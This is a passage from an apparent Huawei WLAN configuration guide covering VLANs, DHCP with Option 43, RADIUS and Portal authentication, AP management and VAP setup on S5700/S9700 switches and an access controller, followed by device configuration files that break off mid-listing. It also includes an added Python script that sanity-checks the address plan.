# Add interfaces GE0/0/1 to GE0/0/3 of the S5700-2 to VLAN 20 (management VLAN) and VLAN 102 (service VLAN). Set PVIDs on the interfaces directly connected to APs; configuring port isolation on these interfaces is also advised to reduce broadcast packets.
[HUAWEI] sysname S5700-2
[S5700-2] vlan batch 20 102
[S5700-2] interface gigabitethernet 0/0/1
[S5700-2-GigabitEthernet0/0/1] port link-type trunk
[S5700-2-GigabitEthernet0/0/1] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/1] quit
[S5700-2] interface gigabitethernet 0/0/2
[S5700-2-GigabitEthernet0/0/2] port link-type trunk
[S5700-2-GigabitEthernet0/0/2] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/2] port trunk pvid vlan 20 //Set a PVID for the interface directly connected to the AP.
[S5700-2-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-2-GigabitEthernet0/0/2] quit
[S5700-2] interface gigabitethernet 0/0/3
[S5700-2-GigabitEthernet0/0/3] port link-type trunk
[S5700-2-GigabitEthernet0/0/3] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/3] port trunk pvid vlan 20
[S5700-2-GigabitEthernet0/0/3] port-isolate enable
[S5700-2-GigabitEthernet0/0/3] quit

# On the S9700, add GE1/0/1 connected to the S5700-1 to VLAN 10 and VLAN 101,
GE1/0/2 connected to the S5700-2 to VLAN 20 and VLAN 102, GE1/0/3 connected to the
Controller to VLAN 300, GE1/0/4 connected to the upper-layer network to VLAN 101 and
VLAN 102, and GE1/0/5 and GE1/0/6 connected to the AC to Eth-Trunk 1. Add Eth-Trunk 1
to VLAN 100.
[HUAWEI] sysname S9700
[S9700] vlan batch 10 20 100 101 102 300
[S9700] interface gigabitethernet 1/0/1
[S9700-GigabitEthernet1/0/1] port link-type trunk
[S9700-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 101
[S9700-GigabitEthernet1/0/1] quit
[S9700] interface gigabitethernet 1/0/2
[S9700-GigabitEthernet1/0/2] port link-type trunk
[S9700-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 102
[S9700-GigabitEthernet1/0/2] quit
[S9700] interface gigabitethernet 1/0/3
[S9700-GigabitEthernet1/0/3] port link-type trunk
[S9700-GigabitEthernet1/0/3] port trunk allow-pass vlan 300
[S9700-GigabitEthernet1/0/3] quit
[S9700] interface gigabitethernet 1/0/4
[S9700-GigabitEthernet1/0/4] port link-type trunk
[S9700-GigabitEthernet1/0/4] port trunk allow-pass vlan 101 102
[S9700-GigabitEthernet1/0/4] quit
[S9700] interface eth-trunk 1
[S9700-Eth-Trunk1] port link-type trunk
[S9700-Eth-Trunk1] port trunk allow-pass vlan 100
[S9700-Eth-Trunk1] trunkport gigabitethernet 1/0/5 1/0/6 //Add GE1/0/5 and GE1/0/6 to Eth-Trunk1.
[S9700-Eth-Trunk1] quit

# On the S9700, configure VLANIF 100 for communication with the AC and VLANIF 300
for communication with the Controller.
[S9700] interface vlanif100
[S9700-Vlanif100] ip address 10.23.100.10 24 //Configure an IP address for communication between the S9700 and AC.
[S9700-Vlanif100] quit
[S9700] interface vlanif300
[S9700-Vlanif300] ip address 10.23.30.10 24 //Configure an IP address for communication between the S9700 and Controller.
[S9700-Vlanif300] quit


# On the AC, add GE2/0/1 and GE2/0/2 connected to the S9700 to Eth-Trunk 1 and add Eth-Trunk 1 to VLAN 100.
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface eth-trunk 1
[AC-Eth-Trunk1] port link-type trunk
[AC-Eth-Trunk1] port trunk allow-pass vlan 100
[AC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 2/0/2 //Add GE2/0/1 and GE2/0/2 to Eth-Trunk1.
[AC-Eth-Trunk1] quit

# Configure VLANIF 100 on the AC for communication with the S9700.


[AC] interface vlanif100
[AC-Vlanif100] ip address 10.23.100.1 24 //Configure an IP address for communication between the S9700 and AC.
[AC-Vlanif100] quit

Step 2 Configure the S9700 as a DHCP server to assign IP addresses to APs and STAs.
# Configure the S9700 to assign IP addresses to the STAs and APs from the global address
pool.
[S9700] dhcp enable
[S9700] interface vlanif 10 //Configure a global address pool to assign IP addresses to AP101 and AP102.
[S9700-Vlanif10] description manage_ap1
[S9700-Vlanif10] ip address 10.23.10.1 24
[S9700-Vlanif10] dhcp select global
[S9700-Vlanif10] quit
[S9700] ip pool manage_ap1
[S9700-ip-pool-manage_ap1] gateway-list 10.23.10.1
[S9700-ip-pool-manage_ap1] network 10.23.10.0 mask 255.255.255.0
[S9700-ip-pool-manage_ap1] option 43 sub-option 3 ip-address 10.23.100.1 //Since a Layer 3 network is deployed between the AC and APs, configure Option 43 to advertise the AC's IP address to the APs.
[S9700-ip-pool-manage_ap1] quit
[S9700] interface vlanif 20 //Configure a global address pool to assign IP addresses to AP201 and AP202.
[S9700-Vlanif20] description manage_ap2
[S9700-Vlanif20] ip address 10.23.20.1 24
[S9700-Vlanif20] dhcp select global
[S9700-Vlanif20] quit
[S9700] ip pool manage_ap2
[S9700-ip-pool-manage_ap2] gateway-list 10.23.20.1
[S9700-ip-pool-manage_ap2] network 10.23.20.0 mask 255.255.255.0
[S9700-ip-pool-manage_ap2] option 43 sub-option 3 ip-address 10.23.100.1 //Since a Layer 3 network is deployed between the AC and APs, configure Option 43 to advertise the AC's IP address to the APs.
[S9700-ip-pool-manage_ap2] quit
[S9700] interface vlanif 101 //Configure a global IP address pool to assign IP addresses to STAs connected to AP101 and AP102.
[S9700-Vlanif101] description manage_area1_sta
[S9700-Vlanif101] ip address 10.23.101.1 24
[S9700-Vlanif101] dhcp select global
[S9700-Vlanif101] quit
[S9700] ip pool manage_area1_sta
[S9700-ip-pool-manage_area1_sta] gateway-list 10.23.101.1
[S9700-ip-pool-manage_area1_sta] network 10.23.101.0 mask 255.255.255.0
[S9700-ip-pool-manage_area1_sta] quit
[S9700] interface vlanif 102 //Configure a global IP address pool to assign IP addresses to STAs connected to AP201 and AP202.
[S9700-Vlanif102] description manage_area2_sta
[S9700-Vlanif102] ip address 10.23.102.1 24
[S9700-Vlanif102] dhcp select global
[S9700-Vlanif102] quit
[S9700] ip pool manage_area2_sta
[S9700-ip-pool-manage_area2_sta] gateway-list 10.23.102.1


[S9700-ip-pool-manage_area2_sta] network 10.23.102.0 mask 255.255.255.0


[S9700-ip-pool-manage_area2_sta] quit

# Configure a default route to the S9700 on the AC.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.100.10
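Step 2 ties several values together that must agree for the APs to find the AC across the Layer 3 network: the gateway of each pool, the AC address announced by Option 43, the AC's VLANIF 100 address used as the CAPWAP source, and the next hop of the AC's default route. The following is an added example, not code from Huawei or from this document, that checks those relationships with Python's standard `ipaddress` module. The plan values are the ones used in Step 2 and Table 15-11; the rule that an AP pool outside the AC's subnet must carry Option 43 is the one stated in the Step 2 comments. The `Pool` class and `check_plan` function are the example's own.

```python
"""Sanity-check the DHCP/address plan of Step 2 before committing it:
each gateway lies in its pool, pools do not overlap, every AP management
pool on a subnet other than the AC's announces the AC's CAPWAP source
address through Option 43, and the AC's default route next hop is on the
AC's own subnet. Added example, not Huawei's code; values are those of
Step 2 and Table 15-11 on this page."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Pool:
    name: str
    network: str                       # pool network, e.g. "10.23.10.0/24"
    gateway: str                       # gateway-list address
    serves_aps: bool = False           # True for the AP management pools
    option43_ac: Optional[str] = None  # AC address announced by Option 43


# Address plan taken from Step 2 of this page.
PLAN = [
    Pool("manage_ap1", "10.23.10.0/24", "10.23.10.1", True, "10.23.100.1"),
    Pool("manage_ap2", "10.23.20.0/24", "10.23.20.1", True, "10.23.100.1"),
    Pool("manage_area1_sta", "10.23.101.0/24", "10.23.101.1"),
    Pool("manage_area2_sta", "10.23.102.0/24", "10.23.102.1"),
]
AC_SOURCE_IP = "10.23.100.1/24"       # AC VLANIF 100, the CAPWAP source
AC_DEFAULT_NEXT_HOP = "10.23.100.10"  # S9700 VLANIF 100


def check_plan(pools: List[Pool], ac_source: str, ac_next_hop: str) -> List[str]:
    """Return a list of problems; an empty list means the plan is consistent."""
    problems: List[str] = []
    ac = ipaddress.ip_interface(ac_source)
    seen = []  # (name, network) of pools already checked, for overlap tests
    for p in pools:
        net = ipaddress.ip_network(p.network)
        gw = ipaddress.ip_address(p.gateway)
        if gw not in net:
            problems.append(f"{p.name}: gateway {gw} is outside {net}")
        for other_name, other_net in seen:
            if net.overlaps(other_net):
                problems.append(f"{p.name}: overlaps pool {other_name}")
        seen.append((p.name, net))
        if p.serves_aps and ac.ip not in net:
            # APs on a remote subnet cannot discover the AC by broadcast,
            # so the pool must hand them the AC address via Option 43.
            if p.option43_ac is None:
                problems.append(f"{p.name}: APs are on a remote subnet but no "
                                "Option 43 AC address is configured")
            elif ipaddress.ip_address(p.option43_ac) != ac.ip:
                problems.append(f"{p.name}: Option 43 announces {p.option43_ac}, "
                                f"but the AC source address is {ac.ip}")
    if ipaddress.ip_address(ac_next_hop) not in ac.network:
        problems.append(f"default route next hop {ac_next_hop} is not in {ac.network}")
    return problems


if __name__ == "__main__":
    for line in check_plan(PLAN, AC_SOURCE_IP, AC_DEFAULT_NEXT_HOP) or ["plan OK"]:
        print(line)
```

The same check is worth re-running whenever a pool or the AC's source interface is renumbered, since an Option 43 value that points at a stale AC address leaves every AP on that subnet unable to register.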

Step 3 Configure a RADIUS server template with authentication, accounting, and authorization servers, and configure Portal authentication.

# Configure a RADIUS server template on the AC, and configure authentication, accounting,
and authorization in the template.
[AC] radius-server template radius1 //Create the RADIUS server template radius1.
[AC-radius-radius1] radius-server authentication 10.23.30.1 1812 source ip-address 10.23.100.1 weight 80 //Configure the active RADIUS authentication server 1 and authentication port 1812. The AC uses the IP address 10.23.100.1 to communicate with the active RADIUS authentication server 1.
[AC-radius-radius1] radius-server authentication 10.23.30.2 1812 source ip-address 10.23.100.1 weight 80 //Configure the active RADIUS authentication server 2 and authentication port 1812. The AC uses the IP address 10.23.100.1 to communicate with the active RADIUS authentication server 2.
[AC-radius-radius1] radius-server authentication 10.23.30.3 1812 source ip-address 10.23.100.1 weight 20 //Configure the standby RADIUS authentication server, with a weight value lower than that of the active authentication servers. Set the authentication port number to 1812. The AC uses the IP address 10.23.100.1 to communicate with the standby RADIUS authentication server.
[AC-radius-radius1] radius-server accounting 10.23.30.1 1813 source ip-address 10.23.100.1 weight 80 //Configure the active RADIUS accounting server 1 to collect user login and logout information and set the accounting port number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the active RADIUS accounting server 1.
[AC-radius-radius1] radius-server accounting 10.23.30.2 1813 source ip-address 10.23.100.1 weight 80 //Configure the active RADIUS accounting server 2 to collect user login and logout information and set the accounting port number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the active RADIUS accounting server 2.
[AC-radius-radius1] radius-server accounting 10.23.30.3 1813 source ip-address 10.23.100.1 weight 20 //Configure the standby RADIUS accounting server, with a weight value lower than that of the active accounting servers. Set the accounting port number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the standby RADIUS accounting server.
[AC-radius-radius1] radius-server shared-key cipher Admin@123 //Configure the shared key for the RADIUS server.
[AC-radius-radius1] radius-server detect-server interval 30 //Set the RADIUS automatic detection interval to 30s. The default value is 60s.
[AC-radius-radius1] quit
[AC] aaa
[AC-aaa] authentication-scheme radius1 //Create the authentication scheme
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //The Controller functions as
the RADIUS server, so the authentication mode must be RADIUS.
[AC-aaa-authen-radius1] quit
[AC-aaa] accounting-scheme radius1 //Create the accounting scheme radius1.
[AC-aaa-accounting-radius1] accounting-mode radius //Set the accounting mode to
RADIUS. To facilitate account status information maintenance on the RADIUS
server, including the login and logout information, and forced logout
information, the accounting mode must be set to radius.
[AC-aaa-accounting-radius1] accounting realtime 15 //Enable real-time
accounting and set the accounting interval to 15 minutes. By default, real-time
accounting is disabled.
[AC-aaa-accounting-radius1] quit
[AC-aaa] domain portal1 //Create the domain portal1.
[AC-aaa-domain-portal1] authentication-scheme radius1 //Bind the authentication
scheme radius1.
[AC-aaa-domain-portal1] accounting-scheme radius1 //Bind the accounting scheme
radius1.
[AC-aaa-domain-portal1] radius-server radius1 //Bind the RADIUS server template
radius1.
[AC-aaa-domain-portal1] quit
[AC-aaa] quit

# Configure a Portal server template for each of the three Controllers.
[AC] web-auth-server portal1 //Create the Portal server template portal1 for
Controller1.
[AC-web-auth-server-portal1] server-ip 10.23.30.1 //Configure an IP address for
the Portal server.
[AC-web-auth-server-portal1] port 50100 //Set the destination port number used
by the device to send packets to the Portal server to 50100 (default setting).
[AC-web-auth-server-portal1] shared-key cipher Admin@123 //Configure the shared
key for message exchange between the AC and Portal server.
[AC-web-auth-server-portal1] url http://10.23.30.1:8080/portal //Configure the
URL to the Portal server.
[AC-web-auth-server-portal1] server-detect interval 30 action log //Set the
Portal server detection interval to 30s (the default is 60s) and record a log
when the detection result changes.
[AC-web-auth-server-portal1] quit
[AC] web-auth-server portal2 //Create the Portal server template portal2 for
Controller2.
[AC-web-auth-server-portal2] server-ip 10.23.30.2
[AC-web-auth-server-portal2] port 50100
[AC-web-auth-server-portal2] shared-key cipher Admin@123
[AC-web-auth-server-portal2] url http://10.23.30.2:8080/portal
[AC-web-auth-server-portal2] server-detect interval 30 action log
[AC-web-auth-server-portal2] quit
[AC] web-auth-server portal3 //Create the Portal server template portal3 for
Controller3.
[AC-web-auth-server-portal3] server-ip 10.23.30.3
[AC-web-auth-server-portal3] port 50100
[AC-web-auth-server-portal3] shared-key cipher Admin@123
[AC-web-auth-server-portal3] url http://10.23.30.3:8080/portal
[AC-web-auth-server-portal3] server-detect interval 30 action log
[AC-web-auth-server-portal3] quit

# Bind the Portal server templates to service VLANIF interfaces to enable Portal
authentication.
[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] domain name portal1 force //Configure the forcible user domain
portal1.
[AC-Vlanif101] domain name portal1 //Configure the default user domain portal1.
[AC-Vlanif101] authentication portal //Configure Portal authentication.
[AC-Vlanif101] web-auth-server portal1 portal3 layer3 //Bind the Portal server
templates portal1 and portal3.
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] domain name portal1 force
[AC-Vlanif102] domain name portal1
[AC-Vlanif102] authentication portal
[AC-Vlanif102] web-auth-server portal2 portal3 layer3
[AC-Vlanif102] quit

Step 4 Configure AC system parameters.


# Configure the AC's country code.
[AC] wlan ac-global country-code cn //Configure the AC country code. Radio
features of APs managed by the AC must conform to local laws and regulations. The
default country code is CN.
Warning: Modifying the country code will clear channel configurations of the AP
radio using the country code and reset the AP. If the new country code does not
support the radio, all configurations of the radio are cleared. Continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.
# Configure the AC's source interface.
[AC] capwap source interface vlanif 100
[AC] wlan

Step 5 Manage the APs on the AC.

# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline according to the obtained AP type IDs.
[AC-wlan-view] ap id 101 type-id 19 mac 60de-4476-e320 //Add the AP6010DN-AGN
offline with the MAC address 60de-4476-e320 and AP ID 101.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 102 type-id 19 mac 60de-4476-e340 //Add the AP6010DN-AGN
offline with the MAC address 60de-4476-e340 and AP ID 102.
[AC-wlan-ap-102] quit
[AC-wlan-view] ap id 201 type-id 19 mac 60de-4476-e360 //Add the AP6010DN-AGN
offline with the MAC address 60de-4476-e360 and AP ID 201.
[AC-wlan-ap-201] quit
[AC-wlan-view] ap id 202 type-id 19 mac 60de-4476-e380 //Add the AP6010DN-AGN
offline with the MAC address 60de-4476-e380 and AP ID 202.
[AC-wlan-ap-202] quit

# Configure AP regions and add the APs to the AP regions.
[AC-wlan-view] ap-region id 1 //Create AP region1 and add APs in area1 to AP
region 1.
[AC-wlan-ap-region-1] ap-region-name area1 //Name the AP region1 area1.
[AC-wlan-ap-region-1] quit
[AC-wlan-view] ap id 101
[AC-wlan-ap-101] region-id 1 //Add AP 101 to AP region1.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 102
[AC-wlan-ap-102] region-id 1
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-region id 2 //Create AP region2 and add APs in area2 to AP
region 2.
[AC-wlan-ap-region-2] ap-region-name area2
[AC-wlan-ap-region-2] quit
[AC-wlan-view] ap id 201
[AC-wlan-ap-201] region-id 2
[AC-wlan-ap-201] quit
[AC-wlan-view] ap id 202
[AC-wlan-ap-202] region-id 2
[AC-wlan-ap-202] quit

# Power on the APs and run the display ap all command to check the AP running status. If
the AP State field displays as normal, the APs are online on the AC.
[AC-wlan-view] display ap all
All AP(s) information:
Normal[4],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type       AP MAC          Profile ID/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
101 AP6010DN-AGN 60de-4476-e320 0/1 normal ap-101
102 AP6010DN-AGN 60de-4476-e340 0/1 normal ap-102
201 AP6010DN-AGN 60de-4476-e360 0/2 normal ap-201
202 AP6010DN-AGN 60de-4476-e380 0/2 normal ap-202
------------------------------------------------------------------------------
Total number: 4,printed: 4

Step 6 Configure WLAN service parameters.

# Create the WMM profile wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create the radio profile radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] power-mode fixed //Set the power mode of the radio to
fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode of the
radio to fixed.
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1 and WLAN-ESS interface 2.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102 //Configure the wlan-ess
interface to allow packets from wireless service VLANs to pass through, which is
one of the prerequisites for intra-AC roaming.
[AC-Wlan-Ess1] quit
[AC] interface wlan-ess 2
[AC-Wlan-Ess2] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess2] quit

# Create the security profile security.
[AC] wlan
[AC-wlan-view] security-profile name security id 1 //Portal authentication has
been enabled on the VLANIF interfaces, so the security policy is left at OPEN
(default setting): no link-layer authentication and no encryption. Access is
controlled by Portal authentication, and air-interface traffic is not encrypted.
[AC-wlan-sec-prof-security] quit

# Create the traffic profile traffic.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit
# Create service sets area1 and area2, and bind the service VLANs, WLAN-ESS interfaces,
security profile, and traffic profile to the service sets. Set the forwarding mode to direct
forwarding.
[AC-wlan-view] service-set name area1 id 1 //Create the service set area1.
[AC-wlan-service-set-area1] ssid city-wlan //Set the SSID to city-wlan.
[AC-wlan-service-set-area1] wlan-ess 1 //Bind the WLAN-ESS interface.
[AC-wlan-service-set-area1] security-profile name security //Bind the security
profile security.
[AC-wlan-service-set-area1] traffic-profile name traffic //Bind the traffic
profile traffic.
[AC-wlan-service-set-area1] service-vlan 101 //Bind the service VLAN 101.
[AC-wlan-service-set-area1] forward-mode direct-forward //Set the forwarding
mode to direct forwarding (default setting).
[AC-wlan-service-set-area1] user-isolate //Configure Layer 2 isolation for users
connected to the same VAP.
[AC-wlan-service-set-area1] quit
[AC-wlan-view] service-set name area2 id 2
[AC-wlan-service-set-area2] ssid city-wlan //Set the SSID to city-wlan. All
service sets must be configured with the same SSID, which is one of the
prerequisites for intra-AC roaming.
[AC-wlan-service-set-area2] wlan-ess 2
[AC-wlan-service-set-area2] security-profile name security //Bind the security
profile security. All service sets must have the same security profile bound,
which is one of the prerequisites for intra-AC roaming.
[AC-wlan-service-set-area2] traffic-profile name traffic
[AC-wlan-service-set-area2] service-vlan 102
[AC-wlan-service-set-area2] forward-mode direct-forward
[AC-wlan-service-set-area2] user-isolate
[AC-wlan-service-set-area2] quit

Step 7 Configure VAPs and deliver VAP parameters to the APs.

# Configure VAPs.
[AC-wlan-view] ap 101 radio 0 //Configure radio0 of the AP6010DN-AGN.
[AC-wlan-radio-101/0] radio-profile name radio //Bind the radio profile to the
radio.
[AC-wlan-radio-101/0] service-set name area1 //Bind the service set to the
radio. A VAP is generated after the binding.
[AC-wlan-radio-101/0] channel 20mhz 1 //Configure the channel based on the
planning result of the WLAN Planner.
[AC-wlan-radio-101/0] power-level 10 //Configure the power based on the planning
result of the WLAN Planner.
[AC-wlan-radio-101/0] quit
[AC-wlan-view] ap 101 radio 1 //Configure radio1 of the AP6010DN-AGN.
[AC-wlan-radio-101/1] radio-profile name radio
[AC-wlan-radio-101/1] service-set name area1
[AC-wlan-radio-101/1] channel 20mhz 153
[AC-wlan-radio-101/1] power-level 10
[AC-wlan-radio-101/1] quit
[AC-wlan-view] ap 102 radio 0
[AC-wlan-radio-102/0] radio-profile name radio
[AC-wlan-radio-102/0] service-set name area1
[AC-wlan-radio-102/0] channel 20mhz 6
[AC-wlan-radio-102/0] power-level 10
[AC-wlan-radio-102/0] quit
[AC-wlan-view] ap 102 radio 1
[AC-wlan-radio-102/1] radio-profile name radio
[AC-wlan-radio-102/1] service-set name area1
[AC-wlan-radio-102/1] channel 20mhz 161
[AC-wlan-radio-102/1] power-level 10
[AC-wlan-radio-102/1] quit
[AC-wlan-view] ap 201 radio 0
[AC-wlan-radio-201/0] radio-profile name radio
[AC-wlan-radio-201/0] service-set name area2
[AC-wlan-radio-201/0] channel 20mhz 1
[AC-wlan-radio-201/0] power-level 10
[AC-wlan-radio-201/0] quit
[AC-wlan-view] ap 201 radio 1
[AC-wlan-radio-201/1] radio-profile name radio
[AC-wlan-radio-201/1] service-set name area2
[AC-wlan-radio-201/1] channel 20mhz 153
[AC-wlan-radio-201/1] power-level 10
[AC-wlan-radio-201/1] quit
[AC-wlan-view] ap 202 radio 0
[AC-wlan-radio-202/0] radio-profile name radio
[AC-wlan-radio-202/0] service-set name area2
[AC-wlan-radio-202/0] channel 20mhz 6
[AC-wlan-radio-202/0] power-level 10
[AC-wlan-radio-202/0] quit
[AC-wlan-view] ap 202 radio 1
[AC-wlan-radio-202/1] radio-profile name radio
[AC-wlan-radio-202/1] service-set name area2
[AC-wlan-radio-202/1] channel 20mhz 161
[AC-wlan-radio-202/1] power-level 10
[AC-wlan-radio-202/1] quit

# Deliver the configuration to the APs.
[AC-wlan-view] commit all //After the WLAN service configuration is complete on
the AC, the configuration takes effect after you deliver it to the APs.
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.

# After the configuration is complete, run the display vap all command. The command output
shows that VAPs have been created.
[AC-wlan-view] display vap all
All VAP Information(Total-8):
SS: Service-set BP: Bridge-profile MP: Mesh-profile
----------------------------------------------------------------------
AP ID Radio ID SS ID BP ID MP ID WLAN ID BSSID Type
----------------------------------------------------------------------
101 0 1 - - 1 60de-4476-e320 service
101 1 1 - - 1 60de-4476-e330 service
102 0 1 - - 1 60de-4476-e340 service
102 1 1 - - 1 60de-4476-e350 service
201 0 2 - - 1 60de-4476-e360 service
201 1 2 - - 1 60de-4476-e370 service
202 0 2 - - 1 60de-4476-e380 service
202 1 2 - - 1 60de-4476-e390 service
----------------------------------------------------------------------
Total: 8

# STAs discover the WLAN with the SSID city-wlan and associate with it, and obtain IP
addresses from the S9700. When a STA opens an HTTP page, it is redirected to the Portal
authentication page; after the user enters the user name and password and passes RADIUS
authentication, the STA can access the network. Run the display station assoc-info
command on the AC. The command output shows that the STAs have connected to the WLAN
city-wlan.
[AC-wlan-view] display station assoc-info all
AP/Rf/WLAN: AP ID/Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------
STA MAC        AP/Rf/WLAN  Rx/Tx  Mode  RSSI  IP address     SSID
------------------------------------------------------------------------------
e019-1dc7-1e08 101/0/1     6/11   11n   -89   10.23.101.254  city-wlan
------------------------------------------------------------------------------
Total stations: 1

# STAs obtain IP addresses and connect to the network.

----End

Configuration Files
l Configuration file of the S5700-1 connected to wired users
#
sysname S5700-1
#
vlan batch 10 101
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 10 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 10
port trunk allow-pass vlan 10 101
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 10
port trunk allow-pass vlan 10 101
port-isolate enable group 1
#
return

l Configuration file of the S5700-2 connected to wireless users
#
sysname S5700-2
#
vlan batch 20 102
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 20 102
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 20
port trunk allow-pass vlan 20 102
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 20
port trunk allow-pass vlan 20 102
port-isolate enable group 1
#
return

l Configuration file of the S9700
#
sysname S9700
#
vlan batch 10 20 100 to 102 300
#
dhcp enable
#
ip pool manage_ap1
gateway-list 10.23.10.1
network 10.23.10.0 mask 255.255.255.0
option 43 sub-option 3 ip-address 10.23.100.1
#
ip pool manage_ap2
gateway-list 10.23.20.1
network 10.23.20.0 mask 255.255.255.0
option 43 sub-option 3 ip-address 10.23.100.1
#
ip pool manage_area1_sta
gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
#
ip pool manage_area2_sta
gateway-list 10.23.102.1
network 10.23.102.0 mask 255.255.255.0
#
interface Vlanif10
description manage_ap1
ip address 10.23.10.1 255.255.255.0
dhcp select global
#
interface Vlanif20
description manage_ap2
ip address 10.23.20.1 255.255.255.0
dhcp select global
#
interface Vlanif100
ip address 10.23.100.10 255.255.255.0
#
interface Vlanif101
description manage_area1_sta
ip address 10.23.101.1 255.255.255.0
dhcp select global
#
interface Vlanif102
description manage_area2_sta
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface Vlanif300
ip address 10.23.30.10 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 300
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 101 to 102
#
interface GigabitEthernet1/0/5
eth-trunk 1
#
interface GigabitEthernet1/0/6
eth-trunk 1
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102
#
wlan ac-global carrier id other ac id 1
#
radius-server template radius1
radius-server shared-key cipher %#%#8M.(7SIkd!~zHjCXjHv%}13$Y#:t3:m]N$G^9yn3%#%#
radius-server authentication 10.23.30.1 1812 source ip-address 10.23.100.1
weight 80
radius-server authentication 10.23.30.2 1812 source ip-address 10.23.100.1
weight 80
radius-server authentication 10.23.30.3 1812 source ip-address 10.23.100.1
weight 20
radius-server accounting 10.23.30.1 1813 source ip-address 10.23.100.1
weight 80
radius-server accounting 10.23.30.2 1813 source ip-address 10.23.100.1
weight 80
radius-server accounting 10.23.30.3 1813 source ip-address 10.23.100.1
weight 20
radius-server detect-server interval 30
#
web-auth-server portal1
server-ip 10.23.30.1
port 50100
shared-key cipher %#%#a^9$8KWl#+C4xc2}#BEQ4!ZIOciEV7$%dT'S/3JX%#%#
url http://10.23.30.1:8080/portal
server-detect interval 30 action log
#
web-auth-server portal2
server-ip 10.23.30.2
port 50100
shared-key cipher %#%#3'uk~,dhv>_!~;W!v6A3YiqL2UU|*4Q>{UH%Tw'A%#%#
url http://10.23.30.2:8080/portal
server-detect interval 30 action log
#
web-auth-server portal3
server-ip 10.23.30.3
port 50100
shared-key cipher %#%#un.DDNfj[X\.u3&zIya<P,3wBg'cEQFedz,DoIO"%#%#
url http://10.23.30.3:8080/portal
server-detect interval 30 action log
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
web-auth-server portal1 portal3 layer3
domain name portal1 force
domain name portal1
authentication portal
#
interface Vlanif102
web-auth-server portal2 portal3 layer3
domain name portal1 force
domain name portal1
authentication portal
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
interface Wlan-Ess1
port trunk allow-pass vlan 101 to 102
#
interface Wlan-Ess2
port trunk allow-pass vlan 101 to 102
#
ip route-static 0.0.0.0 0.0.0.0 10.23.100.10
#
capwap source interface vlanif100
#
wlan
ap-region id 1
ap-region-name area1
ap-region id 2
ap-region-name area2
ap id 101 type-id 19 mac 60de-4476-e320
region-id 1
ap id 102 type-id 19 mac 60de-4476-e340
region-id 1
